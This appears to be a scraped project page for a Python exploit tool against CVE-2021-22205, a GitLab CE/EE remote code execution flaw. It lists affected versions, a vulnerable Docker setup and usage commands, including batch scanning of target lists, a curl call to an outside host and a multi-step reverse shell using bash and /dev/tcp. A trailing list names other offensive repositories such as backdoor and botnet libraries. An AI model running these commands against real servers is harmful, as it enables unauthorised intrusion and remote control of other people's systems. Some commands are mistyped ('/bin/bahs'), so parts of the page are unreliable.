CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Vuln Product

Gitlab CE/EE < 13.10.3
Gitlab CE/EE < 13.9.6
Gitlab CE/EE < 13.8.8

Environment

export GITLAB_HOME=/srv/gitlab

sudo docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0

Vunl Check

Basic usage

python3 CVE-2021-2205.py

Vuln check

python3 CVE-2021-2205.py -v true -t http://gitlab.example.com

command execute

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"

batch scan

python3 CVE-2021-2205.py -s true -f target.txt

Reserve Shell

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"

Reference

https://github.com/mr-r3bot/Gitlab-CVE-2021-22205

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

CVE-2021-22205& GitLab CE/EE RCE

Related tags

Overview

Vuln Impact

Vuln Product

Environment

Vunl Check

Basic usage

Vuln check

command execute

batch scan

Reserve Shell

Reference

Owner

Al1ex

Cobalt Strike < 4.4 dos CVE-2021-36798

Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384

A dynamic multi-STL, multi-process OpenSCAD build system with autoplating support

QHack-2022 - Solutions to the Coding Challenges of QHack 2022

This project is for finding a solution to use Security Onion Elastic data with Jupyter Notebooks.

Mass Shortlink Bypass Merupakan Tools Yang Akan Bypass Shortlink Ke Tujuan Asli, Dibuat Dengan Python 3

The best Python Backdoor👌

Coerce authentication from Windows hosts via MS-FSRVP (Requires FS-VSS-AGENT service running on host)

Tools for converting Nintendo DS binaries to an ELF file for Ghidra/IDA

NFC Implant-base RSA Encrypted Messagging application

pybotnet - A Python Library for building Botnet , Trojan or BackDoor for windows and linux with Telegram control panel

ONT Analysis Toolkit (OAT)

This repo is about steps to create a effective custom wordlist in a few clicks/

Python low-interaction honeyclient

A Proof-of-Concept Layer 2 Denial of Service Attack that disrupts low level operations of Programmable Logic Controllers within industrial environments. Utilizing multithreaded processing, Automator-Terminator delivers a powerful wave of spoofed ethernet packets to a null MAC address.

Cisco RV110w UPnP stack overflow

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT.

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

Malware arcane - Scripts and notes on my malware analysis journey

MTBLLS Ethical Hacking Tool Announcement of v2.0